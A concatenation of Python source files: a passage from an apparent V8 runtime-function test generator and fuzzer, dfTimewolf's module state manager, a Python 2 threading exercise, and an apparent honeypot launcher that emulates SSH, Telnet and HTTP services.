re.compile("^\s*CONVERT_BOOLEAN_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Boolean", match.group(1), int(match.group(2))))
property_details_parser = ArgParser(
re.compile("^\s*CONVERT_PROPERTY_DETAILS_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("PropertyDetails", match.group(1), int(match.group(2))))
arg_parsers = [handle_arg_parser, plain_arg_parser, number_handle_arg_parser,
smi_arg_parser,
double_arg_parser, number_arg_parser, strict_mode_arg_parser,
boolean_arg_parser, property_details_parser]
def SetArgsLength(self, match):
self.argslength = int(match.group(1))
def TryParseArg(self, line):
for parser in Function.arg_parsers:
match = parser.regex.match(line)
if match:
arg = parser.ArgCtor(match)
self.args[arg.index] = arg
return True
return False
def Filename(self):
return "%s.js" % self.name.lower()
def __str__(self):
s = [self.name, "("]
argcount = self.argslength
if argcount < 0:
print("WARNING: unknown argslength for function %s" % self.name)
if self.args:
argcount = max([self.args[i].index + 1 for i in self.args])
else:
argcount = 0
for i in range(argcount):
if i > 0: s.append(", ")
s.append(self.args[i].type if i in self.args else "<unknown>")
s.append(")")
return "".join(s)
class Macro(object):
def __init__(self, match):
self.name = match.group(1)
self.args = [s.strip() for s in match.group(2).split(",")]
self.lines = []
self.indentation = 0
self.AddLine(match.group(3))
def AddLine(self, line):
if not line: return
if not self.lines:
# This is the first line, detect indentation.
self.indentation = len(line) - len(line.lstrip())
line = line.rstrip("\\\n ")
if not line: return
assert len(line[:self.indentation].strip()) == 0, \
("expected whitespace: '%s', full line: '%s'" %
(line[:self.indentation], line))
line = line[self.indentation:]
if not line: return
self.lines.append(line + "\n")
def Finalize(self):
for arg in self.args:
pattern = re.compile(r"(##|\b)%s(##|\b)" % arg)
for i in range(len(self.lines)):
self.lines[i] = re.sub(pattern, "%%(%s)s" % arg, self.lines[i])
def FillIn(self, arg_values):
filler = {}
assert len(arg_values) == len(self.args)
for i in range(len(self.args)):
filler[self.args[i]] = arg_values[i]
result = []
for line in self.lines:
result.append(line % filler)
return result
# Parses HEADERFILENAME to find out which runtime functions are "inline".
def FindInlineRuntimeFunctions():
inline_functions = []
with open(HEADERFILENAME, "r") as f:
inline_list = "#define INLINE_FUNCTION_LIST(F) \\\n"
inline_function = re.compile(r"^\s*F\((\w+), \d+, \d+\)\s*\\?")
mode = "SEARCHING"
for line in f:
if mode == "ACTIVE":
match = inline_function.match(line)
if match:
inline_functions.append(match.group(1))
if not line.endswith("\\\n"):
mode = "SEARCHING"
elif mode == "SEARCHING":
if line == inline_list:
mode = "ACTIVE"
return inline_functions
def ReadFileAndExpandMacros(filename):
found_macros = {}
expanded_lines = []
with open(filename, "r") as f:
found_macro = None
for line in f:
if found_macro is not None:
found_macro.AddLine(line)
if not line.endswith("\\\n"):
found_macro.Finalize()
found_macro = None
continue
match = MACRO.match(line)
if match:
found_macro = Macro(match)
if found_macro.name in EXPAND_MACROS:
found_macros[found_macro.name] = found_macro
else:
found_macro = None
continue
match = FIRST_WORD.match(line)
if match:
first_word = match.group(1)
if first_word in found_macros:
MACRO_CALL = re.compile("%s\(([^)]*)\)" % first_word)
match = MACRO_CALL.match(line)
assert match
args = [s.strip() for s in match.group(1).split(",")]
expanded_lines += found_macros[first_word].FillIn(args)
continue
expanded_lines.append(line)
return expanded_lines
# Detects runtime functions by parsing FILENAME.
def FindRuntimeFunctions():
inline_functions = FindInlineRuntimeFunctions()
functions = []
expanded_lines = ReadFileAndExpandMacros(FILENAME)
function = None
partial_line = ""
for line in expanded_lines:
# Multi-line definition support, ignoring macros.
if line.startswith("RUNTIME_FUNCTION") and not line.endswith("{\n"):
if line.endswith("\\\n"): continue
partial_line = line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if partial_line.endswith("{"):
line = partial_line
partial_line = ""
else:
continue
match = FUNCTION.match(line)
if match:
function = Function(match)
if function.name in inline_functions:
function.inline = "_"
continue
if function is None: continue
match = ARGSLENGTH.match(line)
if match:
function.SetArgsLength(match)
continue
if function.TryParseArg(line):
continue
if line == FUNCTIONEND:
if function is not None:
functions.append(function)
function = None
return functions
# Hack: This must have the same fields as class Function above, because the
# two are used polymorphically in RunFuzzer(). We could use inheritance...
class Builtin(object):
def __init__(self, match):
self.name = match.group(1)
args = match.group(2)
self.argslength = 0 if args == "" else args.count(",") + 1
self.inline = ""
self.args = {}
if self.argslength > 0:
args = args.split(",")
for i in range(len(args)):
# a = args[i].strip() # TODO: filter out /* comments */ first.
a = ""
self.args[i] = Arg("Object", a, i)
def __str__(self):
return "%s(%d)" % (self.name, self.argslength)
def FindJSBuiltins():
PATH = "src"
fileslist = []
for (root, dirs, files) in os.walk(PATH):
for f in files:
if f.endswith(".js"):
fileslist.append(os.path.join(root, f))
builtins = []
regexp = re.compile("^function (\w+)\s*\((.*?)\) {")
matches = 0
for filename in fileslist:
with open(filename, "r") as f:
file_contents = f.read()
file_contents = js2c.ExpandInlineMacros(file_contents)
lines = file_contents.split("\n")
partial_line = ""
for line in lines:
if line.startswith("function") and not '{' in line:
partial_line += line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if '{' in line:
line = partial_line
partial_line = ""
else:
continue
match = regexp.match(line)
if match:
builtins.append(Builtin(match))
return builtins
# Classifies runtime functions.
def ClassifyFunctions(functions):
# Can be fuzzed with a JavaScript testcase.
js_fuzzable_functions = []
# We have enough information to fuzz these, but they need inputs that
# cannot be created or passed around in JavaScript.
cctest_fuzzable_functions = []
# This script does not have enough information about these.
unknown_functions = []
types = {}
for f in functions:
if f.name in BLACKLISTED:
continue
decision = js_fuzzable_functions
custom = CUSTOM_KNOWN_GOOD_INPUT.get(f.name, None)
if f.argslength < 0:
# Unknown length -> give up unless there's a custom definition.
if custom and custom[-1] is not None:
f.argslength = custom[-1]
assert len(custom) == f.argslength + 1, \
("%s: last custom definition must be argslength" % f.name)
else:
decision = unknown_functions
else:
if custom:
# Any custom definitions must match the known argslength.
assert len(custom) == f.argslength + 1, \
("%s should have %d custom definitions but has %d" %
(f.name, f.argslength + 1, len(custom)))
for i in range(f.argslength):
if custom and custom[i] is not None:
# All good, there's a custom definition.
pass
elif not i in f.args:
# No custom definition and no parse result -> give up.
decision = unknown_functions
else:
t = f.args[i].type
if t in NON_JS_TYPES:
decision = cctest_fuzzable_functions
else:
assert Generator.IsTypeSupported(t), \
("type generator not found for %s, function: %s" % (t, f))
decision.append(f)
return (js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions)
def _GetKnownGoodArgs(function, generator):
custom_input = CUSTOM_KNOWN_GOOD_INPUT.get(function.name, None)
definitions = []
argslist = []
for i in range(function.argslength):
if custom_input and custom_input[i] is not None:
name = "arg%d" % i
definitions.append("var %s = %s;" % (name, custom_input[i]))
else:
arg = function.args[i]
name = arg.name
definitions += generator.RandomVariable(name, arg.type, simple=True)
argslist.append(name)
return (definitions, argslist)
def _GenerateTestcase(function, definitions, argslist, throws):
s = ["// Copyright 2014 the V8 project authors. All rights reserved.",
"// AUTO-GENERATED BY tools/generate-runtime-tests.py, DO NOT MODIFY",
"// Flags: --allow-natives-syntax --harmony"] + definitions
call = "%%%s%s(%s);" % (function.inline, function.name, ", ".join(argslist))
if throws:
s.append("try {")
s.append(call);
s.append("} catch(e) {}")
else:
s.append(call)
testcase = "\n".join(s)
return testcase
def GenerateJSTestcaseForFunction(function):
gen = Generator()
(definitions, argslist) = _GetKnownGoodArgs(function, gen)
testcase = _GenerateTestcase(function, definitions, argslist,
function.name in THROWS)
path = os.path.join(BASEPATH, function.Filename())
with open(path, "w") as f:
f.write("%s\n" % testcase)
def GenerateTestcases(functions):
shutil.rmtree(BASEPATH) # Re-generate everything.
os.makedirs(BASEPATH)
for f in functions:
GenerateJSTestcaseForFunction(f)
def _SaveFileName(save_path, process_id, save_file_index):
return "%s/fuzz_%d_%d.js" % (save_path, process_id, save_file_index)
def _GetFuzzableRuntimeFunctions():
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
return js_fuzzable_functions
FUZZ_TARGET_LISTS = {
"runtime": _GetFuzzableRuntimeFunctions,
"builtins": FindJSBuiltins,
}
def RunFuzzer(process_id, options, stop_running):
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.001
SLEEP_TIME_FACTOR = 1.25
base_file_name = "/dev/shm/runtime_fuzz_%d" % process_id
test_file_name = "%s.js" % base_file_name
stderr_file_name = "%s.out" % base_file_name
save_file_index = 0
while os.path.exists(_SaveFileName(options.save_path, process_id,
save_file_index)):
save_file_index += 1
targets = FUZZ_TARGET_LISTS[options.fuzz_target]()
try:
for i in range(options.num_tests):
if stop_running.is_set(): break
function = None
while function is None or function.argslength == 0:
function = random.choice(targets)
args = []
definitions = []
gen = Generator()
for i in range(function.argslength):
arg = function.args[i]
argname = "arg%d%s" % (i, arg.name)
args.append(argname)
definitions += gen.RandomVariable(argname, arg.type, simple=False)
testcase = _GenerateTestcase(function, definitions, args, True)
with open(test_file_name, "w") as f:
f.write("%s\n" % testcase)
with open("/dev/null", "w") as devnull:
with open(stderr_file_name, "w") as stderr:
process = subprocess.Popen(
[options.binary, "--allow-natives-syntax", "--harmony",
"--enable-slow-asserts", test_file_name],
stdout=devnull, stderr=stderr)
end_time = time.time() + options.timeout
timed_out = False
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if time.time() >= end_time:
# Kill the process and wait for it to exit.
os.kill(process.pid, signal.SIGTERM)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
if exit_code != 0 and not timed_out:
oom = False
with open(stderr_file_name, "r") as stderr:
for line in stderr:
if line.strip() == "# Allocation failed - process out of memory":
oom = True
break
if oom: continue
save_name = _SaveFileName(options.save_path, process_id,
save_file_index)
shutil.copyfile(test_file_name, save_name)
save_file_index += 1
except KeyboardInterrupt:
stop_running.set()
finally:
if os.path.exists(test_file_name):
os.remove(test_file_name)
if os.path.exists(stderr_file_name):
os.remove(stderr_file_name)
def BuildOptionParser():
usage = """Usage: %%prog [options] ACTION
where ACTION can be:
info Print diagnostic info.
check Check that runtime functions can be parsed as expected, and that
test cases exist.
generate Parse source code for runtime functions, and auto-generate
test cases for them. Warning: this will nuke and re-create
%(path)s.
fuzz Generate fuzz tests, run them, save those that crashed (see options).
""" % {"path": os.path.relpath(BASEPATH)}
o = optparse.OptionParser(usage=usage)
o.add_option("--binary", default="out/x64.debug/d8",
help="d8 binary used for running fuzz tests (default: %default)")
o.add_option("--fuzz-target", default="runtime",
help="Set of functions targeted by fuzzing. Allowed values: "
"%s (default: %%default)" % ", ".join(FUZZ_TARGET_LISTS))
o.add_option("-n", "--num-tests", default=1000, type="int",
help="Number of fuzz tests to generate per worker process"
" (default: %default)")
o.add_option("--save-path", default="~/runtime_fuzz_output",
help="Path to directory where failing tests will be stored"
" (default: %default)")
o.add_option("--timeout", default=20, type="int",
help="Timeout for each fuzz test (in seconds, default:"
"%default)")
return o
def ProcessOptions(options, args):
options.save_path = os.path.expanduser(options.save_path)
if options.fuzz_target not in FUZZ_TARGET_LISTS:
print("Invalid fuzz target: %s" % options.fuzz_target)
return False
if len(args) != 1 or args[0] == "help":
return False
return True
def Main():
parser = BuildOptionParser()
(options, args) = parser.parse_args()
if not ProcessOptions(options, args):
parser.print_help()
return 1
action = args[0]
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
builtins = FindJSBuiltins()
if action == "test":
print("put your temporary debugging code here")
return 0
if action == "info":
print("%d functions total; js_fuzzable_functions: %d, "
"cctest_fuzzable_functions: %d, unknown_functions: %d"
% (len(functions), len(js_fuzzable_functions),
len(cctest_fuzzable_functions), len(unknown_functions)))
print("%d JavaScript builtins" % len(builtins))
print("unknown functions:")
for f in unknown_functions:
print(f)
return 0
if action == "check":
errors = 0
def CheckCount(actual, expected, description):
if len(actual) != expected:
print("Expected to detect %d %s, but found %d." % (
expected, description, len(actual)))
print("If this change is intentional, please update the expectations"
" at the top of %s." % THIS_SCRIPT)
return 1
return 0
errors += CheckCount(functions, EXPECTED_FUNCTION_COUNT,
"functions in total")
errors += CheckCount(js_fuzzable_functions, EXPECTED_FUZZABLE_COUNT,
"JavaScript-fuzzable functions")
errors += CheckCount(cctest_fuzzable_functions, EXPECTED_CCTEST_COUNT,
"cctest-fuzzable functions")
errors += CheckCount(unknown_functions, EXPECTED_UNKNOWN_COUNT,
"functions with incomplete type information")
errors += CheckCount(builtins, EXPECTED_BUILTINS_COUNT,
"JavaScript builtins")
def CheckTestcasesExisting(functions):
errors = 0
for f in functions:
if not os.path.isfile(os.path.join(BASEPATH, f.Filename())):
print("Missing testcase for %s, please run '%s generate'" %
(f.name, THIS_SCRIPT))
errors += 1
files = filter(lambda filename: not filename.startswith("."),
os.listdir(BASEPATH))
if (len(files) != len(functions)):
unexpected_files = set(files) - set([f.Filename() for f in functions])
for f in unexpected_files:
print("Unexpected testcase: %s" % os.path.join(BASEPATH, f))
errors += 1
print("Run '%s generate' to automatically clean these up."
% THIS_SCRIPT)
return errors
errors += CheckTestcasesExisting(js_fuzzable_functions)
def CheckNameClashes(runtime_functions, builtins):
errors = 0
runtime_map = {}
for f in runtime_functions:
runtime_map[f.name] = 1
for b in builtins:
if b.name in runtime_map:
print("Builtin/Runtime_Function name clash: %s" % b.name)
errors += 1
return errors
errors += CheckNameClashes(functions, builtins)
if errors > 0:
return 1
print("Generated runtime tests: all good.")
return 0
if action == "generate":
GenerateTestcases(js_fuzzable_functions)
return 0
if action == "fuzz":
processes = []
if not os.path.isdir(options.save_path):
os.makedirs(options.save_path)
stop_running = multiprocessing.Event()
for i in range(multiprocessing.cpu_count()):
args = (i, options, stop_running)
p = multiprocessing.Process(target=RunFuzzer, args=args)
p.start()
processes.append(p)
try:
for i in range(len(processes)):
processes[i].join()
except KeyboardInterrupt:
stop_running.set()
for i in range(len(processes)):
processes[i].join()
return 0
if __name__ == "__main__":
sys.exit(Main())
|
state.py
|
# -*- coding: utf-8 -*-
"""This class maintains the internal dfTimewolf state.
Use it to track errors, abort on global failures, clean up after modules, etc.
"""
from concurrent.futures import ThreadPoolExecutor
import importlib
import logging
import threading
import traceback
from typing import Callable, Dict, List, Sequence, TYPE_CHECKING, Type, Any, TypeVar, cast # pylint: disable=line-too-long
from dftimewolf.config import Config
from dftimewolf.lib import errors, utils
from dftimewolf.lib.errors import DFTimewolfError
from dftimewolf.lib.modules import manager as modules_manager
from dftimewolf.lib.module import ThreadAwareModule
if TYPE_CHECKING:
from dftimewolf.lib import module as dftw_module
from dftimewolf.lib.containers import interface
T = TypeVar("T", bound="interface.AttributeContainer") # pylint: disable=invalid-name,line-too-long
# TODO(tomchop): Consider changing this to `dftimewolf.state` if we ever need
# more granularity.
logger = logging.getLogger('dftimewolf')
NEW_ISSUE_URL = 'https://github.com/log2timeline/dftimewolf/issues/new'
class DFTimewolfState(object):
"""The main State class.
Attributes:
command_line_options (dict[str, str]): Command line options passed to
dftimewolf.
config (dftimewolf.config.Config): Class to be used throughout execution.
errors (list[tuple[str, bool]]): errors generated by a module. These
should be cleaned up after each module run using the CleanUp() method.
global_errors (list[tuple[str, bool]]): the CleanUp() method moves non
critical errors to this attribute for later reporting.
input (list[str]): data that the current module will use as input.
output (list[str]): data that the current module generates.
recipe: (dict[str, str]): recipe declaring modules to load.
store (dict[str, object]): arbitrary data for modules.
"""
def __init__(self, config: Type[Config]) -> None:
"""Initializes a state."""
super(DFTimewolfState, self).__init__()
self.command_line_options = {} # type: Dict[str, str]
self._cache = {} # type: Dict[str, str]
self._module_pool = {} # type: Dict[str, dftw_module.BaseModule]
self._state_lock = threading.Lock()
self._threading_event_per_module = {} # type: Dict[str, threading.Event]
self.config = config
self.errors = [] # type: List[DFTimewolfError]
self.global_errors = [] # type: List[DFTimewolfError]
self.recipe = {} # type: Dict[str, Any]
self.store = {} # type: Dict[str, List[interface.AttributeContainer]]
self.streaming_callbacks = {} # type: Dict[Type[interface.AttributeContainer], List[Callable[[Any], Any]]] # pylint: disable=line-too-long
self._abort_execution = False
def _InvokeModulesInThreads(self, callback: Callable[[Any], Any]) -> None:
"""Invokes the callback function on all the modules in separate threads.
Args:
callback (function): callback function to invoke on all the modules.
"""
threads = []
for module_definition in self.recipe['modules']:
thread_args = (module_definition, )
thread = threading.Thread(target=callback, args=thread_args)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
self.CheckErrors(is_global=True)
def ImportRecipeModules(self, module_locations: Dict[str, str]) -> None:
"""Dynamically loads the modules declared in a recipe.
Args:
module_location (dict[str, str]): A dfTimewolf module name - Python module
mapping. e.g.:
{'GRRArtifactCollector': 'dftimewolf.lib.collectors.grr_hosts'}
Raises:
errors.RecipeParseError: if a module requested in a recipe does not
exist in the mapping.
"""
for module in self.recipe['modules'] + self.recipe.get('preflights', []):
name = module['name']
if name not in module_locations:
msg = (f'In {self.recipe["name"]}: module {name} cannot be found. '
'It may not have been declared.')
raise errors.RecipeParseError(msg)
logger.debug('Loading module {0:s} from {1:s}'.format(
name, module_locations[name]))
location = module_locations[name]
try:
importlib.import_module(location)
except ModuleNotFoundError as exception:
msg = f'Cannot find Python module for {name} ({location}): {exception}'
raise errors.RecipeParseError(msg)
def LoadRecipe(self,
recipe: Dict[str, Any],
module_locations: Dict[str, str]) -> None:
"""Populates the internal module pool with modules declared in a recipe.
Args:
recipe (dict[str, Any]): recipe declaring modules to load.
Raises:
RecipeParseError: if a module in the recipe has not been declared.
"""
self.recipe = recipe
module_definitions = recipe.get('modules', [])
preflight_definitions = recipe.get('preflights', [])
self.ImportRecipeModules(module_locations)
for module_definition in module_definitions + preflight_definitions:
# Combine CLI args with args from the recipe description
module_name = module_definition['name']
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
runtime_name = module_definition.get('runtime_name')
if not runtime_name:
runtime_name = module_name
self._module_pool[runtime_name] = module_class(self, name=runtime_name)
def FormatExecutionPlan(self) -> str:
"""Formats execution plan.
Returns information about loaded modules and their corresponding arguments
to stdout.
Returns:
str: String representation of loaded modules and their parameters.
"""
plan = ""
maxlen = 0
modules = self.recipe.get('preflights', []) + self.recipe.get('modules', [])
for module in modules:
if not module['args']:
continue
spacing = len(max(module['args'].keys(), key=len))
maxlen = maxlen if maxlen > spacing else spacing
for module in modules:
runtime_name = module.get('runtime_name')
if runtime_name:
plan += '{0:s} ({1:s}):\n'.format(runtime_name, module['name'])
else:
plan += '{0:s}:\n'.format(module['name'])
new_args = utils.ImportArgsFromDict(
module['args'], self.command_line_options, self.config)
if not new_args:
plan += ' *No params*\n'
for key, value in new_args.items():
plan += ' {0:s}{1:s}\n'.format(key.ljust(maxlen + 3), repr(value))
return plan
def LogExecutionPlan(self) -> None:
"""Logs the result of FormatExecutionPlan() using the base logger."""
for line in self.FormatExecutionPlan().split('\n'):
logger.debug(line)
def AddToCache(self, name: str, value: Any) -> None:
"""Thread-safe method to add data to the state's cache.
If the cached item is already in the cache it will be
overwritten with the new value.
Args:
name (str): string with the name of the cache variable.
value (object): the value that will be stored in the cache.
"""
with self._state_lock:
self._cache[name] = value
def GetFromCache(self, name: str, default_value: Any=None) -> Any:
"""Thread-safe method to get data from the state's cache.
Args:
name (str): string with the name of the cache variable.
default_value (object): the value that will be returned if
the item does not exist in the cache. Optional argument
and defaults to None.
Returns:
object: object from the cache that corresponds to the name, or
the value of "default_value" if the cache does not contain
the variable.
"""
with self._state_lock:
return self._cache.get(name, default_value)
def StoreContainer(self, container: "interface.AttributeContainer") -> None:
"""Thread-safe method to store data in the state's store.
Args:
container (AttributeContainer): data to store.
"""
with self._state_lock:
self.store.setdefault(container.CONTAINER_TYPE, []).append(container)
def GetContainers(self,
container_class: Type[T],
pop: bool=False) -> Sequence[T]:
"""Thread-safe method to retrieve data from the state's store.
Args:
container_class (type): AttributeContainer class used to filter data.
pop (Optional[bool]): Whether to remove the containers from the state when
they are retrieved.
Returns:
Collection[AttributeContainer]: attribute container objects provided in
the store that correspond to the container type.
"""
with self._state_lock:
container_objects = cast(
List[T], self.store.get(container_class.CONTAINER_TYPE, []))
if pop:
self.store[container_class.CONTAINER_TYPE] = []
return tuple(container_objects)
def _SetupModuleThread(self, module_definition: Dict[str, str]) -> None:
"""Calls the module's SetUp() function and sets a threading event for it.
Callback for _InvokeModulesInThreads.
Args:
module_definition (dict[str, str]): recipe module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
logger.info('Setting up module: {0:s}'.format(runtime_name))
new_args = utils.ImportArgsFromDict(
module_definition['args'], self.command_line_options, self.config)
module = self._module_pool[runtime_name]
try:
if isinstance(module, ThreadAwareModule):
module.PreSetUp()
module.SetUp(**new_args)
if isinstance(module, ThreadAwareModule):
module.PostSetUp()
except errors.DFTimewolfError:
msg = "A critical error occurred in module {0:s}, aborting execution."
logger.critical(msg.format(module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
self._threading_event_per_module[runtime_name] = threading.Event()
self.CleanUp()
def SetupModules(self) -> None:
"""Performs setup tasks for each module in the module pool.
Threads declared modules' SetUp() functions. Takes CLI arguments into
account when replacing recipe parameters for each module.
"""
# Note that vars() copies the values of argparse.Namespace to a dict.
self._InvokeModulesInThreads(self._SetupModuleThread)
def _RunModuleThread(self, module_definition: Dict[str, str]) -> None:
"""Runs the module's Process() function.
Callback for _InvokeModulesInThreads.
Waits for any blockers to have finished before running Process(), then
sets an Event flag declaring the module has completed.
Args:
module_definition (dict): module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
for dependency in module_definition['wants']:
self._threading_event_per_module[dependency].wait()
module = self._module_pool[runtime_name]
# Abort processing if a module has had critical failures before.
if self._abort_execution:
logger.critical(
'Aborting execution of {0:s} due to previous errors'.format(
module.name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
return
logger.info('Running module: {0:s}'.format(runtime_name))
try:
if isinstance(module, ThreadAwareModule):
module.PreProcess()
futures = []
logger.info(
'Running {0:d} threads, max {1:d} simultaneous for module {2:s}'\
.format(
len(self.GetContainers(module.GetThreadOnContainerType())),
module.GetThreadPoolSize(),
runtime_name))
with ThreadPoolExecutor(max_workers=module.GetThreadPoolSize()) \
as executor:
for container in \
self.GetContainers(module.GetThreadOnContainerType()):
futures.append(
executor.submit(module.Process, container))
module.PostProcess()
for fut in futures:
if fut.exception():
raise fut.exception() # type: ignore
if not module.KeepThreadedContainersInState():
self.GetContainers(module.GetThreadOnContainerType(), True)
else:
module.Process()
except errors.DFTimewolfError:
logger.critical(
"Critical error in module {0:s}, aborting execution".format(
module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
logger.info('Module {0:s} finished execution'.format(runtime_name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
def RunPreflights(self) -> None:
"""Runs preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
args = preflight_definition.get('args', {})
new_args = utils.ImportArgsFromDict(
args, self.command_line_options, self.config)
preflight = self._module_pool[runtime_name]
try:
preflight.SetUp(**new_args)
preflight.Process()
finally:
self.CheckErrors(is_global=True)
def CleanUpPreflights(self) -> None:
"""Executes any cleanup actions defined in preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
preflight = self._module_pool[runtime_name]
try:
preflight.CleanUp()
finally:
self.CheckErrors(is_global=True)
def InstantiateModule(self, module_name: str) -> "dftw_module.BaseModule":
"""Instantiates an arbitrary dfTimewolf module.
Args:
module_name (str): The name of the module to instantiate.
Returns:
BaseModule: An instance of a dftimewolf Module, which is a subclass of
BaseModule.
"""
module_class: Type["dftw_module.BaseModule"]
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
return module_class(self)
def RunModules(self) -> None:
"""Performs the actual processing for each module in the module pool."""
self._InvokeModulesInThreads(self._RunModuleThread)
def RegisterStreamingCallback(
self,
target: Callable[["interface.AttributeContainer"], Any],
container_type: Type["interface.AttributeContainer"]) -> None:
"""Registers a callback for a type of container.
The function to be registered should a single parameter of type
interface.AttributeContainer.
Args:
target (function): function to be called.
container_type (type[interface.AttributeContainer]): container type on
which the callback will be called.
"""
if container_type not in self.streaming_callbacks:
self.streaming_callbacks[container_type] = []
self.streaming_callbacks[container_type].append(target)
def StreamContainer(self, container: "interface.AttributeContainer") -> None:
"""Streams a container to the callbacks that are registered to handle it.
Args:
container (interface.AttributeContainer): container instance that will be
streamed to any registered callbacks.
"""
for callback in self.streaming_callbacks.get(type(container), []):
callback(container)
def AddError(self, error: DFTimewolfError) -> None:
"""Adds an error to the state.
Args:
error (errors.DFTimewolfError): The dfTimewolf error to add.
"""
if error.critical:
self._abort_execution = True
self.errors.append(error)
def CleanUp(self) -> None:
"""Cleans up after running a module.
The state's output becomes the input for the next stage. Any errors are
moved to the global_errors attribute so that they can be reported at a
later stage.
"""
# Move any existing errors to global errors
self.global_errors.extend(self.errors)
self.errors = []
def CheckErrors(self, is_global: bool=False) -> None:
"""Checks for errors and exits if any of them are critical.
Args:
is_global (Optional[bool]): True if the global_errors attribute should
be checked. False if the error attribute should be checked.
"""
error_objects = self.global_errors if is_global else self.errors
critical_errors = False
if error_objects:
logger.error('dfTimewolf encountered one or more errors:')
for index, error in enumerate(error_objects):
logger.error('{0:d}: error from {1:s}: {2:s}'.format(
index+1, error.name, error.message))
if error.stacktrace:
for line in error.stacktrace.split('\n'):
logger.error(line)
if error.critical:
critical_errors = True
if any(error.unexpected for error in error_objects):
logger.critical('One or more unexpected errors occurred.')
logger.critical(
'Please consider opening an issue: {0:s}'.format(NEW_ISSUE_URL))
if critical_errors:
raise errors.CriticalError('Critical error found. Aborting.')
|
mtsleepF.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2019/8/10 4:09 PM
from atexit import register
from random import randrange
from threading import Thread, Lock, currentThread
from time import sleep, ctime
class CleaOutputSet(set):
def __str__(self):
return ', '.join(x for x in self)
lock = Lock()
loops = (randrange(2, 5) for x in xrange(randrange(3, 7)))
remaining = CleaOutputSet()
def loop(nsec):
myname = currentThread().name
lock.acquire()
remaining.add(myname)
print '[%s] Started %s' % (ctime(), myname)
lock.release()
sleep(nsec)
lock.acquire()
remaining.remove(myname)
print '[%s] Complted %s (%d secs)' % (ctime(), myname, nsec)
print ' (remaining: %s)' % (remaining or 'NONE')
lock.release()
def main():
for pause in loops:
Thread(target=loop, args=(pause,)).start()
@register
def _atexit():
print 'all DONE at:', ctime()
if __name__ == '__main__':
main()
|
app.py
|
from Tunnel.packetBackUp import startIntercept
from Tunnel.VirtualDevice import addNewDevice
import configparser
from xeger import Xeger
import logging.handlers
import os
from vfssh.CyderSSHServer import start_ssh_server
from connection.server_telnet import start_telnet_server
from connection.server_http import start_http_server
from multiprocessing import Process
import gconstant as gc
def main():
# Configparser to read configurations
config = configparser.ConfigParser(interpolation=None)
config.read(os.path.dirname(os.path.realpath(__file__)) + '/configuration/host_config.ini')
print("Starting Program...")
debug = logging.getLogger('cyder-debug')
if config.getboolean('CONFIGURATION', 'debug', fallback=False):
debug.debug('#'*50)
debug.debug('Starting Program...')
# Get Host Machine IP & MAC Address
ip, mac_addr = config.get('HOST', 'ip', fallback=None), config.get('HOST', 'mac_address', fallback=None)
if ip is None:
return
# Services (Specified in Configuration File)
services = dict()
for key in config['HOST']:
try:
services[int(key)] = process(config['HOST'][key])
except ValueError:
pass
# SSH Server (AsyncSSH)
if config.getboolean('HOST', 'ssh', fallback=False):
print('SSH Enabled')
start_service(services[22].strip(), 22, '0.0.0.0', start_ssh_server)
del services[22]
# Telnet Server (Twisted)
if config.getboolean('HOST', 'telnet', fallback=False):
print('Telnet Enabled')
start_service(services[23], 23, '0.0.0.0', start_telnet_server)
del services[23]
# HTTP Server (Waitress)
if config.getboolean('HOST', 'http', fallback=False):
print('HTTP Enabled')
start_service(services[80].strip(), 80, '0.0.0.0', start_http_server)
del services[80]
# Port 2323
start_service(services[2323], 2323, '0.0.0.0', start_telnet_server)
del services[2323]
# Add Device To Subnet
addNewDevice(name='HOST', services=services, fingerprint=config.get('HOST', 'fingerprint'),
ip=ip, mac_addr=mac_addr)
# addNewDevice(name='Test', services=service, fingerprint=host['fingerprint'], ip='192.168.1.1', macAddr=mac_addr)
print('Done Loading...')
debug.debug('Done Loading...')
startIntercept()
def start_service(banner, port, host, target):
# Function to run SSH / Telnet / HTTP in multiprocess
mp = Process(target=target, args=(host, port, banner,))
mp.daemon = True
mp.start()
def process(data, limit=10, increment=100):
# Process Regex - Increment 150 ~ 7.9 seconds
try:
x = Xeger(limit)
val = x.xeger(data)
except ValueError:
val = process(data, limit+increment, increment)
return val
if __name__ == "__main__":
main()
|
_ops_test.py
|
# https://github.com/tensorflow/tensorflow/issues/27023
import warnings
